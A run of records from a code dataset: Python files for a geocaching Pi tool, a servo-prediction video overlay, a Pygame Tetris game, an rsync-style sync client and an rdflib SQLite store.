TracklogExporter(TRACKLOG_TARGET, TRACKLOG_EXPORT_TARGET)\n tracklogexport.start()\n\n finder = GeocacheFinder(DATABASE_FILENAME, lambda: led.toggle(LED_SEARCH_STATUS))\n finder.start()\n\n geocache_display = GeocacheDisplay(SCROLL_SPEED)\n\n loader = GeocacheLoader(DATABASE_FILENAME, GEOCACHE_SOURCE, \n lambda: finder.pause(),\n lambda: finder.unpause())\n loader.start()\n\n dashboard = Dashboard()\n\n mainloop(led, gps, finder, geocache_display, dashboard)\n","sub_path":"cacheberrypi.py","file_name":"cacheberrypi.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"648025908","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"ANIMESH BALA ANI\"\"\"\n\n# Import Modules\nimport os\nimport cv2\nimport math\n\nimport config\nfrom model import NvidiaNet\nfrom utils import load_checkpoint, single_prediction\n\n\n# Global Variables\nSOURCE_FOLDER = '../dataset/images/03_16_2020_0/output_0000'\nOUTPUT = 'output/output_0000.mp4'\nSHAPE = (360, 640) # height, width\nQUIT_KEY = ord('q')\nMAX_ANGLE = 90\nNEW_DATA = False\n\n\n# Functions\ndef draw_line(image, value, origin, angle, line_length, color, thiccness):\n cv2.line(image,\n (origin[0],\n origin[1]),\n (origin[0] - int(math.sin(angle*(5-value)/10)*line_length),\n origin[1] - int(math.cos(angle*(5-value)/10)*line_length)),\n color, thiccness)\n\n\ndef put_text(image, origin, target_color, predict_color, servo, servo_pred):\n \n image = cv2.putText(image,\n '{0:02d}'.format(servo),\n (origin[0] - 60, origin[1] + 40),\n cv2.FONT_HERSHEY_SIMPLEX, 1, target_color, 3, cv2.LINE_AA) \n image = cv2.putText(image,\n \"(Target)\",\n (origin[0] - 200, origin[1] + 40),\n cv2.FONT_HERSHEY_SIMPLEX, 1, target_color, 3, cv2.LINE_AA)\n image = cv2.putText(image,\n '{0:02d}'.format(servo_pred),\n (origin[0] + 15, origin[1] + 40),\n cv2.FONT_HERSHEY_SIMPLEX, 1, predict_color, 3, cv2.LINE_AA)\n image = cv2.putText(image,\n \"(Predict)\",\n (origin[0] + 70, origin[1] + 40),\n cv2.FONT_HERSHEY_SIMPLEX, 1, predict_color, 3, cv2.LINE_AA)\n return image\n\n\n# Main Method\ndef main():\n origin = [SHAPE[1]//2, int(0.80*SHAPE[0])] # x,y\n line_length = SHAPE[0]//2\n thiccness = 10\n angle = math.pi*MAX_ANGLE/90\n target_color = (0,255,127)\n predict_color = (0,127,255)\n out = cv2.VideoWriter(OUTPUT, -1, 13, (SHAPE[1], SHAPE[0]))\n \n data = os.listdir(SOURCE_FOLDER)\n model = NvidiaNet(in_channels=3).to(config.DEVICE)\n load_checkpoint(config.CHECKPOINT, model)\n model.eval()\n \n for i in range(len(data)):\n image = cv2.imread(os.path.join(SOURCE_FOLDER, data[i]))\n if NEW_DATA:\n servo = int(data[i].split('_')[-3])\n else:\n servo = int(data[i].split('_')[-2][1:])\n\n servo_pred = single_prediction(model, image)\n \n image = cv2.resize(image, (SHAPE[1], SHAPE[0]), interpolation=cv2.INTER_CUBIC)\n \n # line and text display\n draw_line(image, servo, origin, angle, line_length, target_color, thiccness)\n draw_line(image, servo_pred, origin, angle, line_length, predict_color, thiccness)\n image = put_text(image, origin, target_color, predict_color, servo, servo_pred)\n \n # write image in video\n out.write(image)\n \n out.release()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"visualization/servo_prediction_video.py","file_name":"servo_prediction_video.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"71543573","text":"import pygame # learn more: https://python.org/pypi/Pygame\r\nimport random\r\nimport math\r\nimport time\r\nfrom itertools import cycle\r\npygame.init()\r\npixels = 20\r\nscore = 0\r\ndiff = 1\r\nclock = pygame.time.Clock()\r\nmusicChoice = \"Regular.mp3\"\r\nlines = 0\r\ngrid = []\r\ngridcolor = []\r\ntemparrayx = [0,0,0]\r\ntemparrayy = [0,0,0]\r\nscreen = pygame.display.set_mode((pixels * 10 + 100, pixels * 20))\r\nblockI = [\r\n [[0,0,0,0],\r\n [1,2,1,1],\r\n \r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,1,0,0],\r\n [0,2,0,0],\r\n [0,1,0,0],\r\n [0,1,0,0]]\r\n \r\n ] \r\nblockL = [\r\n [[0,0,0,0],\r\n [1,2,1,0],\r\n [1,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[1,1,0,0],\r\n [0,2,0,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,0,1,0],\r\n [1,2,1,0],\r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,1,0,0],\r\n [0,2,0,0],\r\n [0,1,1,0],\r\n [0,0,0,0]]\r\n ] \r\nblockO = [\r\n [ [0,0,0,0],\r\n [0,2,1,0],\r\n [0,1,1,0],\r\n [0,0,0,0]]\r\n \r\n ] \r\nblockS = [\r\n [ [0,0,0,0],\r\n [0,2,1,0],\r\n [1,1,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [ [1,0,0,0],\r\n [1,2,0,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n \r\n \r\n ] \r\nblockT = [\r\n [[0,0,0,0],\r\n [1,2,1,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,1,0,0],\r\n [1,2,0,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,1,0,0],\r\n [1,2,1,0],\r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,1,0,0],\r\n [0,2,1,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n ] \r\nblockZ = [\r\n [ [0,0,0,0],\r\n [0,1,2,0],\r\n [0,0,1,1],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,0,1,0],\r\n [0,0,2,1],\r\n [0,0,0,1],\r\n [0,0,0,0]]\r\n ]\r\n \r\nblockJ = [\r\n [[0,0,0,0],\r\n [0,1,2,1],\r\n [0,0,0,1],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,0,1,1],\r\n [0,0,2,0],\r\n [0,0,1,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,1,0,0],\r\n [0,1,2,1],\r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,0,1,0],\r\n [0,0,2,0],\r\n [0,1,1,0],\r\n [0,0,0,0]]\r\n ]\r\n \r\n \r\nblocks = [blockI, blockL, blockO, blockS, blockT, blockZ, blockJ]\r\ncolors = [\"lightblue\", \"red\", \"orange\", \"yellow\", \"purple\" , \"green\" , \"blue\"]\r\nclass DisplayBlock:\r\n def __init__(self,b,color):\r\n self.blocks = []\r\n self.color = color\r\n self.rotation = b[0]\r\n for count in range(len(self.rotation)): # read rotation block\r\n for j in range(len(self.rotation[count])):\r\n if self.rotation[count][j] == 1:\r\n block = Block(j, count , self.color)\r\n self.blocks.append(block)\r\n if self.rotation[count][j] == 2:\r\n block = Block(j, count, self.color)\r\n self.blocks.append(block)\r\n def Render(self):\r\n \r\n for count in range(len(self.blocks)):\r\n screen.blit(self.blocks[count].surface, ((self.blocks[count].x + 10) * pixels , (self.blocks[count].y + 15) * pixels))\r\nclass TetrisBlock:\r\n def __init__(self,b,color):\r\n self.matrix = b\r\n self.blocks = []\r\n self.origin = 0\r\n self.counter = 0\r\n self.color = color\r\n self.rotation = self.matrix[self.counter]\r\n self.ReadRotation()\r\n self.CheckIt()\r\n self.origin.x = 5 # set in middle\r\n self.origin.y = 1\r\n self.oldx = 0\r\n self.oldy = 0\r\n self.SetDifference()\r\n def Render(self):\r\n screen.blit(self.origin.surface, (self.origin.x * pixels, self.origin.y * pixels))\r\n for count in range(len(self.blocks)):\r\n screen.blit(self.blocks[count].surface, ((self.blocks[count].x) * pixels , (self.blocks[count].y) * pixels))\r\n def CheckIt(self):\r\n for count in range(len(self.blocks)): # set difference \r\n self.blocks[count].diffx = self.origin.x - self.blocks[count].x\r\n self.blocks[count].diffy = self.origin.y - self.blocks[count].y\r\n def 
RotationCheck(self):\r\n canmove = True\r\n \r\n if(canmove):\r\n for count in range(len(self.blocks)):\r\n \r\n self.blocks[count].diffx = self.origin.x - self.blocks[count].x\r\n self.blocks[count].diffy = self.origin.y - self.blocks[count].y\r\n return True\r\n \r\n def GoDown(self):\r\n canmove = True\r\n try:\r\n if (grid[self.origin.y + 1][self.origin.x] != 1):\r\n pass\r\n else:\r\n canmove = False \r\n for count in range(len(self.blocks)):\r\n if (grid[self.blocks[count].y + 1][self.blocks[count].x] != 1):\r\n pass\r\n else:\r\n canmove = False\r\n if canmove: \r\n if (grid[self.origin.y + 1][self.origin.x] != 1):\r\n self.origin.y += 1\r\n for count in range(len(self.blocks)):\r\n if (grid[self.blocks[count].y + 1][self.blocks[count].x] != 1):\r\n self.blocks[count].y += 1\r\n except IndexError:\r\n canmove = False\r\n return canmove \r\n def GoRight(self):\r\n yeet = True\r\n try:\r\n for count in range(len(self.blocks)):\r\n if (grid[self.blocks[count].y][self.blocks[count].x +1] != 1):\r\n pass\r\n else:\r\n yeet = False\r\n break\r\n if (grid[self.origin.y][self.origin.x + 1] != 1 & yeet == True):\r\n self.origin.x += 1\r\n for count in range(len(self.blocks)): \r\n self.blocks[count].x += 1\r\n except IndexError:\r\n pass\r\n def GoLeft(self):\r\n yeet = True\r\n try:\r\n for count in range(len(self.blocks)):\r\n if (grid[self.blocks[count].y][self.blocks[count].x - 1] != 1 and self.blocks[count].x != 0): \r\n pass\r\n else:\r\n yeet = False \r\n break\r\n if (grid[self.origin.y][self.origin.x - 1] != 1 & yeet == True):\r\n self.origin.x += -1\r\n for count in range(len(self.blocks)):\r\n self.blocks[count].x += -1\r\n except IndexError:\r\n pass\r\n def SetDifference(self):\r\n needToMove = False\r\n needToMoveLeft = False\r\n canmove = True\r\n flipit = True\r\n for count in range(len(self.blocks)): # set difference\r\n try:\r\n if(grid[self.origin.y + self.blocks[count].diffy][self.origin.x + self.blocks[count].diffx] != 0):\r\n canmove = False\r\n flipit = False\r\n except IndexError:\r\n pass\r\n if(flipit == False):\r\n if(self.counter == len(self.matrix) - 1):\r\n self.counter = 0\r\n self.rotation = self.matrix[self.counter]\r\n if(self.counter == 0):\r\n self.counter = len(self.matrix) - 1\r\n self.rotation = self.matrix[self.counter]\r\n \r\n self.ReadRotation()\r\n \r\n for count in range(len(self.blocks)):\r\n \r\n self.blocks[count].x = temparrayx[count]\r\n self.blocks[count].y = temparrayy[count]\r\n self.origin.x = self.oldx\r\n self.origin.y = self.oldy \r\n \r\n \r\n if(canmove):\r\n for count in range(len(self.blocks)): # set difference\r\n \r\n \r\n self.blocks[count].x = self.origin.x + self.blocks[count].diffx\r\n self.blocks[count].y = self.origin.y + self.blocks[count].diffy\r\n if self.blocks[count].x == 10:\r\n needToMove = True\r\n if self.blocks[count].x == -1:\r\n needToMoveLeft = True\r\n if needToMove == True:\r\n self.origin.x += -1\r\n for count in range(len(self.blocks)):\r\n self.blocks[count].x += -1\r\n if needToMoveLeft == True:\r\n self.origin.x += 1\r\n for count in range(len(self.blocks)):\r\n self.blocks[count].x += 1\r\n return True\r\n def ReadRotation(self): # make sure to reset origin\r\n \r\n self.blocks = []\r\n \r\n \r\n for count in range(len(self.rotation)): # read rotation block\r\n for j in range(len(self.rotation[count])):\r\n if self.rotation[count][j] == 1:\r\n block = Block(j, count , self.color)\r\n self.blocks.append(block)\r\n if self.rotation[count][j] == 2:\r\n block = Block(j, count, self.color)\r\n self.origin = 
block\r\n \r\n def RotateLeft(self):\r\n for count in range(len(self.blocks)):\r\n \r\n temparrayx[count] = self.blocks[count].x\r\n temparrayy[count] = self.blocks[count].y\r\n self.counter += -1\r\n \r\n if self.counter == -1:\r\n self.counter = len(self.matrix) - 1\r\n self.rotation = self.matrix[self.counter] \r\n tempx = self.origin.x\r\n tempy = self.origin.y\r\n self.oldy = self.origin.y\r\n self.oldx = self.origin.x\r\n self.ReadRotation()\r\n asd = self.RotationCheck()\r\n \r\n self.origin.x = tempx\r\n self.origin.y = tempy\r\n self.SetDifference()\r\n \r\n def RotateRight(self):\r\n for count in range(len(self.blocks)):\r\n \r\n temparrayx[count] = self.blocks[count].x\r\n temparrayy[count] = self.blocks[count].y\r\n self.counter += 1\r\n if self.counter == len(self.matrix):\r\n self.counter = 0\r\n self.rotation = self.matrix[self.counter] \r\n tempx = self.origin.x\r\n tempy = self.origin.y\r\n \r\n self.ReadRotation()\r\n asd = self.RotationCheck()\r\n \r\n self.origin.x = tempx\r\n self.origin.y = tempy\r\n self.SetDifference()\r\n \r\n def HardDrop(self):\r\n global diff, score\r\n go = True\r\n asd = 0\r\n while go:\r\n go = self.GoDown()\r\n asd += 10 * diff\r\n score += asd\r\n return go\r\n\r\n def SetGrid(self):\r\n grid[self.origin.y][self.origin.x] = 1\r\n gridcolor[self.origin.y][self.origin.x] = self.origin.surface\r\n for count in range(len(self.blocks)):\r\n grid[self.blocks[count].y][self.blocks[count].x] = 1\r\n gridcolor[self.blocks[count].y][self.blocks[count].x] = self.blocks[count].surface\r\nclass Block:\r\n def __init__(self, x,y,color):\r\n self.x = x\r\n self.y = y\r\n self.diffx = 0\r\n self.diffy = 0\r\n self.surface = pygame.image.load(color+\".png\")\r\n self.oldDiffx = 0\r\n self.oldDiffy = 0 \r\ndef End(cBlock):\r\n asd = False\r\n for counter in range(len(cBlock.blocks)):\r\n if grid[cBlock.blocks[counter].y][cBlock.blocks[counter].y] == 1:\r\n asd = True\r\n if grid[cBlock.origin.y][cBlock.origin.x] == 1:\r\n asd = True\r\n return asd\r\ndef CheckLines():\r\n global lines, score, diff\r\n yeet = True\r\n asd = 0\r\n ds = []\r\n for counter in range(len(grid)):\r\n for j in range(len(grid[counter])):\r\n if grid[counter][j] != 1:\r\n yeet = False\r\n \r\n if yeet == True:\r\n lines += 1\r\n asd += 1\r\n ds.append(counter)\r\n for i in range(10):\r\n grid[counter][i] = 0\r\n yeet = True\r\n \r\n if(asd != 0):\r\n if asd == 4:\r\n score += 1200 * diff\r\n elif asd == 3:\r\n score += 300 * diff\r\n elif asd == 2:\r\n score += 100 * diff\r\n elif asd == 1:\r\n score += 40 * diff\r\n for counter in reversed(range(max(ds))):\r\n \r\n for j in range(len(grid[counter])):\r\n if grid[counter][j] == 1:\r\n print(j)\r\n if counter + 1 < 20: \r\n grid[counter][j] = 0\r\n grav = True\r\n nasd = 1\r\n \r\n while grav:\r\n if counter + nasd <= 19:\r\n if grid[counter + nasd][j] == 0:\r\n nasd += 1 \r\n \r\n else:\r\n gridcolor[counter + nasd - 1][j] = gridcolor[counter][j]\r\n gridcolor[counter][j] = 0\r\n\r\n grav = False\r\n else:\r\n grav = False\r\n \r\n \r\n \r\n asd = 0\r\ndef main():\r\n global lines, grid,gridcolor, score, diff\r\n lines = 0\r\n diff = 1\r\n grid = []\r\n gridcolor = []\r\n score = 0\r\n pygame.mixer.music.load(musicChoice)\r\n pygame.mixer.music.play(-1)\r\n # tetris record 79 950 # FIX BEING ABLE TO ROTATE OUT OF BOUNDS THANKS\r\n yeetDiff = 0\r\n \r\n run = True\r\n move = True\r\n downcounter = 0\r\n autodown = 0\r\n ######\r\n for x in range(20):\r\n row = []\r\n color = []\r\n for y in range(10): #I SNATCHED THIS BIT OF CODE FROM 
THE DEVIL(stackoverflow)\r\n row.append(0)\r\n color.append(0)\r\n grid.append(row)\r\n gridcolor.append(color)\r\n\r\n \r\n#######\r\n prevRn = random.randint(0,6)\r\n rn = random.randint(0,6)\r\n nextblock = DisplayBlock(blocks[rn],colors[rn])\r\n currentblock = TetrisBlock(blocks[prevRn], colors[prevRn])\r\n run = True\r\n forwhat = pygame.font.SysFont(None,20,True,True)\r\n while run:\r\n yeetDiff += 1\r\n if yeetDiff == 10000:\r\n diff += 1\r\n yeetDiff = 0\r\n levelimage = forwhat.render(\"Level\" + \" \" + str(diff), False,(255,0,0)) \r\n fontimage = forwhat.render(\"Lines\" + \" \" + str(lines), False, (255,0,0))\r\n scoreImage = forwhat.render(\"Score\" + \" \" + str(score), False, (255,0,0))\r\n autodown += 1\r\n if autodown >= 25 / diff:\r\n autodown = 0\r\n move = currentblock.GoDown()\r\n screen.fill((0,0,0))\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n pygame.quit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_d:\r\n currentblock.RotateRight()\r\n if event.key == pygame.K_a:\r\n currentblock.RotateLeft()\r\n if event.key == pygame.K_LEFT:\r\n currentblock.GoLeft()\r\n if event.key == pygame.K_RIGHT:\r\n currentblock.GoRight()\r\n if event.key == pygame.K_SPACE:\r\n move = currentblock.HardDrop()\r\n keys = pygame.key.get_pressed()\r\n downcounter += 1\r\n if keys[pygame.K_DOWN]:\r\n if downcounter >= 5:\r\n downcounter = 0\r\n move = currentblock.GoDown()\r\n if move == False:\r\n move = True\r\n currentblock.SetGrid()\r\n prevRn = rn\r\n currentblock = TetrisBlock(blocks[prevRn], colors[prevRn])\r\n rn = random.randint(0,6)\r\n nextblock = DisplayBlock(blocks[rn], colors[rn])\r\n CheckLines()\r\n if End(currentblock):\r\n run = False\r\n GameEnd()\r\n for counter in range(len(grid)): \r\n for j in range(len(grid[counter])):\r\n \r\n if grid[counter][j] == 1:\r\n screen.blit(gridcolor[counter][j], (j * pixels,counter * pixels))\r\n currentblock.Render()\r\n nextblock.Render()\r\n screen.blit(fontimage,(200, 50))\r\n screen.blit(scoreImage, (200,100))\r\n screen.blit(levelimage,(200,150))\r\n clock.tick(60)\r\n pygame.display.flip()\r\n pygame.mixer.music.stop() \r\ndef GameEnd():\r\n global musicChoice\r\n \r\n yeet = pygame.Surface((75,75))\r\n forwhat = pygame.font.SysFont(None,20,True,True)\r\n rect = pygame.Rect(100,200,75,75)\r\n asd = True\r\n r = 0\r\n g = 0\r\n b = 0 # 200 by 400\r\n i = 0\r\n fontimage = forwhat.render(\"Tetris\", False, (255,0,0))\r\n\r\n seinfeldSurface = pygame.Surface((75,75))\r\n seinfeldRect = pygame.Rect(0,0,75,75)\r\n seinfeldFont = forwhat.render(\"Seinfeld\", False, (255,0,0))\r\n regularSurface = pygame.Surface((75,75))\r\n regularRect = pygame.Rect(0,80,75,75)\r\n regularFont = forwhat.render(\"Regular\", False, (255,0,0))\r\n while asd: \r\n screen.fill((r,g,b))\r\n yeet.fill((r,b,g))\r\n seinfeldSurface.fill((g,r,b))\r\n regularSurface.fill((g,r,b))\r\n screen.blit(seinfeldSurface,(0,0))\r\n screen.blit(regularSurface,(0,80))\r\n screen.blit(yeet,(100,200))\r\n screen.blit(fontimage,(100,200))\r\n screen.blit(seinfeldFont,(0,0)) # r g b : r b g : b r g : b g r : g r b : g b r\r\n screen.blit(regularFont,(0,80))\r\n fontimage = forwhat.render(\"TETRIS\", False, (b,r,g))\r\n seinfeldFont = forwhat.render(\"Seinfeld\", False, (b,g,r))\r\n regularFont = forwhat.render(\"Regular\", False, (g,b,r))\r\n r = math.sin(0.5*i + 0) * 127 + 128;\r\n g = math.sin(0.5*i + 2) * 127 + 128;\r\n b = math.sin(0.5*i + 4) * 127 + 128;\r\n i += 0.1\r\n if i == 32:\r\n i = 0 \r\n for event in 
pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n asd = False\r\n pygame.quit()\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n x , y = pygame.mouse.get_pos()\r\n if rect.collidepoint(x,y):\r\n main()\r\n if seinfeldRect.collidepoint(x,y):\r\n \r\n musicChoice = \"Seinfeld.mp3\"\r\n if regularRect.collidepoint(x,y):\r\n musicChoice = \"Regular.mp3\"\r\n clock.tick(60)\r\n pygame.display.flip()\r\n\r\nGameEnd()\r\n","sub_path":"tetris/tetrisDone/tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":18539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"565125176","text":"from sys import stderr\nfrom cStringIO import StringIO\nfrom gzip import open as gzopen, GzipFile\nfrom os import remove\nfrom os.path import isfile, join as pathjoin, exists as pathexists\nfrom zipfile import ZipFile\nfrom .manifest import manifest\nfrom .clientbase import rsyncbase\n\nclass rsclient(rsyncbase):\n def __init__(self, jsz, jloc, urlbase):\n rsyncbase.__init__(self, jsz, jloc, urlbase)\n self.manifest = jloc['manifest']\n self.jloc = jloc\n self.rflist = [] # the unproccessed rfpathes.\n\n def __call__(self):\n yield self.report.setTitle('cli.manifest')\n self.climfobj = manifest(self.jloc)\n if isfile(self.manifest):\n self.climfobj.load(gzopen(self.manifest, 'rb'))\n\n yield self.report.setTitle('srv.manifest')\n self.srvmfobj = manifest(self.jloc)\n bodyfobj = StringIO(self.urlget('manifest'))\n try:\n self.srvmfobj.load(GzipFile('srvmanifest', 'rb',\n fileobj = bodyfobj))\n except:\n bodyfobj.seek(0)\n raise Exception('Error: with response %s' % bodyfobj.read())\n\n self.report.setTitle('cli.traversal')\n genobj = self.cli_traversal()\n iterobj = genobj.next()\n while iterobj:\n yield iterobj\n iterobj = genobj.next()\n\n self.report.setTitle('srv.traversal')\n genobj = self.srv_traversal()\n iterobj = genobj.next()\n while iterobj:\n yield iterobj\n iterobj = genobj.next()\n\n if self.rflist:\n # remove all files which do not covered by any srvmfobj pacakge.\n yield self.report.setTitle('clean ')\n for rfpath in self.rflist: remove(pathjoin(self.rootdir, rfpath))\n yield self.report.incDels(len(self.rflist))\n\n self.report.setTitle('result')\n yield self.report.setStep(0, 0)\n yield None\n\n def cli_traversal(self):\n step = 0\n self.report.branch = None\n for chksum in self.climfobj.keys():\n yield self.report.setStep(step, len(self.climfobj))\n if chksum in self.srvmfobj:\n self.report.branch = 'match'\n # all files in the current packages are not changed.\n assert(self.climfobj[chksum].rflist ==\n self.srvmfobj[chksum].rflist)\n self.report.incKeeps(len(self.climfobj[chksum].rflist))\n del(self.srvmfobj[chksum])\n step = step + 1\n else:\n chksum0 = self.srvmfobj.find(chksum)\n if chksum0 is None:\n self.report.branch = 'discard'\n # orphan package in client, discard it.\n # remember the rflist, remove them if required.\n self.rflist.extend(self.climfobj[chksum].rflist)\n del(self.climfobj[chksum])\n else:\n self.report.branch = 'patch'\n # cached patch found, use it.\n patchbody = self.urlpost('patch', chksum)\n rflist = self.climfobj[chksum].rflist\n self.patchflist(patchbody, rflist)\n del(self.climfobj[chksum])\n self.climfobj[chksum0] = self.srvmfobj.pop(chksum0)\n self.climfobj[chksum0].clean_history()\n step = step + 1\n self.climfobj.save(gzopen(self.manifest, 'wb'))\n yield self.report.setStep(step, len(self.climfobj))\n self.report.branch = None\n yield None\n\n def srv_traversal(self):\n maxstep = len(self.srvmfobj)\n #self.srvmfobj.save(open('xxx.mf', 'wt'))\n self.report.branch = None\n for chksum in self.srvmfobj.keys():\n yield self.report.setStep(maxstep - len(self.srvmfobj), maxstep)\n rflist = self.srvmfobj[chksum].rflist\n self.signprepare()\n self.signobj.push_rflist(rflist)\n self.signobj.push_end()\n fpathes = self.signobj.fpathes\n if not self.signobj.fpathes: signbody = ''\n else:\n self.signobj.run(self.jsz.buf)\n signbody = self.signobj.sinkobj.get_string()\n self.signobj = None\n limit = self.jsz.signlimit * len(rflist) +\\\n sum(map(lambda rfpath: len(rfpath), rflist))\n if len(signbody) < limit:\n 
self.report.branch = 'zip'\n # new package or not worth to do cmps, use cached zip directly.\n # clean up firstly.\n rmcnt = 0\n for fpath in fpathes:\n if not pathexists(fpath): continue\n remove(fpath)\n rmcnt = rmcnt + 1\n self.report.incDels(rmcnt)\n zipbody = self.urlpost('zip', chksum)\n self.applyzip(zipbody)\n else:\n self.report.branch = 'cmp'\n # no cache, do signature, patch.\n patchbody = self.urlpost('cmp', signbody)\n self.patchflist(patchbody)\n self.climfobj[chksum] = self.srvmfobj.pop(chksum)\n self.climfobj.save(gzopen(self.manifest, 'wb'))\n assert(self.srvmfobj == {})\n yield self.report.setStep(maxstep, maxstep)\n self.report.branch = None\n yield None\n\n def applyzip(self, zipbody):\n zipfobj = StringIO(zipbody)\n zipobj = ZipFile(zipfobj, 'r')\n rflist = zipobj.namelist()\n zipobj.extractall(self.rootdir)\n self.rflist = filter(lambda rfpath: rfpath not in rflist, self.rflist)\n zipobj.close()\n zipfobj.close()\n self.report.incNews(len(rflist))\n return rflist\n","sub_path":"pyrsync/client0.py","file_name":"client0.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"140479656","text":"import os\nimport re\nimport sqlite3\nfrom functools import reduce\nfrom hashlib import sha1\n\nfrom rdflib import RDF, BNode, Literal, URIRef, Variable, logger\nfrom rdflib.events import Dispatcher\nfrom rdflib.graph import DATASET_DEFAULT_GRAPH_ID, Dataset, Graph, QuotedGraph\nfrom rdflib.plugins.stores.regexmatching import PYTHON_REGEX, REGEXTerm\nfrom rdflib.store import Store\n\n__all__ = [\"SQLiteStore\"]\n\n\nSUBJECT = 0\nPREDICATE = 1\nOBJECT = 2\nCONTEXT = 3\n\nTERM_COMBINATIONS = dict(\n [\n (term, cnt)\n for cnt, term in enumerate(\n \"\\\nUUUU,UUUB,UUUF,UUVU,UUVB,UUVF,UUBU,UUBB,UUBF,UULU,UUUL,UULB,UULF,\\\nUUFU,UUFB,UUFF,UVUU,UVUB,UVUF,UVVU,UVVB,UVVF,UVBU,UVBB,UVBF,UVLU,\\\nUVLB,UVLF,UVFU,UVFB,UVFF,VUUU,VUUB,VUUF,VUVU,VUVB,VUVF,VUBU,VUBB,\\\nVUBF,VULU,VULB,VULF,VUFU,VUFB,VUFF,VVUU,VVUB,VVUF,VVVU,VVVB,VVVF,\\\nVVBU,VVBB,VVBF,VVLU,VVLB,VVLF,VVFU,VVFB,VVFF,BUUU,BUUB,BUUF,BUVU,\\\nBUVB,BUVF,BUBU,BUBB,BUBF,BULU,BULB,BULF,BUFU,BUFB,BUFF,BVUU,BVUB,\\\nBVUF,BVVU,BVVB,BVVF,BVBU,BVBB,BVBF,BVLU,BVLB,BVLF,BVFU,BVFB,BVFF,\\\nFUUU,FUUB,FUUF,FUVU,FUVB,FUVF,FUBU,FUBB,FUBF,FULU,FULB,FULF,FUFU,\\\nFUFB,FUFF,FVUU,FVUB,FVUF,FVVU,FVVB,FVVF,FVBU,FVBB,FVBF,FVLU,FVLB,\\\nFVLF,FVFU,FVFB,FVFF\".split(\n \",\"\n )\n )\n ]\n)\n\nREVERSE_TERM_COMBINATIONS = dict(\n [(value, key) for key, value in list(TERM_COMBINATIONS.items())]\n)\n\n\nCOUNT_SELECT = 0\nCONTEXT_SELECT = 1\nTRIPLE_SELECT = 2\nTRIPLE_SELECT_NO_ORDER = 3\n\nASSERTED_NON_TYPE_PARTITION = 3\nASSERTED_TYPE_PARTITION = 4\nQUOTED_PARTITION = 5\nASSERTED_LITERAL_PARTITION = 6\n\nFULL_TRIPLE_PARTITIONS = [QUOTED_PARTITION, ASSERTED_LITERAL_PARTITION]\n\nINTERNED_PREFIX = \"kb_\"\n\nTERM_INSTANTIATION_DICT = {\"U\": URIRef, \"B\": BNode, \"V\": Variable, \"L\": Literal}\n\nGRAPH_TERM_DICT = {\n \"F\": (QuotedGraph, URIRef),\n \"U\": (Graph, URIRef),\n \"B\": (Graph, BNode),\n}\n\n\n# Takes an instance of a Graph (Graph, QuotedGraph, Dataset, or BackwardCompatGraph)\n# and returns the Graphs identifier and 'type' ('U' for Graphs, 'F' for QuotedGraphs ).\ndef normalize_graph(graph):\n if isinstance(graph, QuotedGraph):\n return graph.identifier, \"F\"\n else:\n if isinstance(graph, (Graph, Dataset)):\n return graph.identifier, term_to_letter(graph.identifier)\n else:\n return graph, term_to_letter(graph)\n\n\ndef term_to_letter(term):\n if isinstance(term, URIRef):\n return \"U\"\n elif isinstance(term, BNode):\n return \"B\"\n elif isinstance(term, Literal):\n return \"L\"\n elif isinstance(term, QuotedGraph):\n return \"F\"\n elif isinstance(term, Variable):\n return \"V\"\n elif isinstance(term, Graph):\n return term_to_letter(term.identifier)\n elif term is None:\n return \"L\"\n else:\n raise Exception(\n f\"The given term ({term}, a {type(term)}) is not an \"\n \"instance of any of the known types (BNode, Literal, \"\n \"QuotedGraph, URIRef or Variable).\"\n )\n\n\ndef construct_graph(term):\n return GRAPH_TERM_DICT[term]\n\n\ndef type_to_termcombination(member, klass, context):\n try:\n rt = TERM_COMBINATIONS[\n \"%sU%s%s\"\n % (\n term_to_letter(member),\n term_to_letter(klass),\n normalize_graph(context)[-1],\n )\n ]\n return rt\n except Exception:\n raise Exception(\n \"Unable to persist classification triple: %s %s %s %s\"\n % (member, \"rdf:type\", klass, context)\n )\n\n\ndef statement_to_termcombination(subj, pred, obj, context):\n return TERM_COMBINATIONS[\n \"%s%s%s%s\"\n % (\n term_to_letter(subj),\n term_to_letter(pred),\n term_to_letter(obj),\n normalize_graph(context)[-1],\n )\n ]\n\n\ndef 
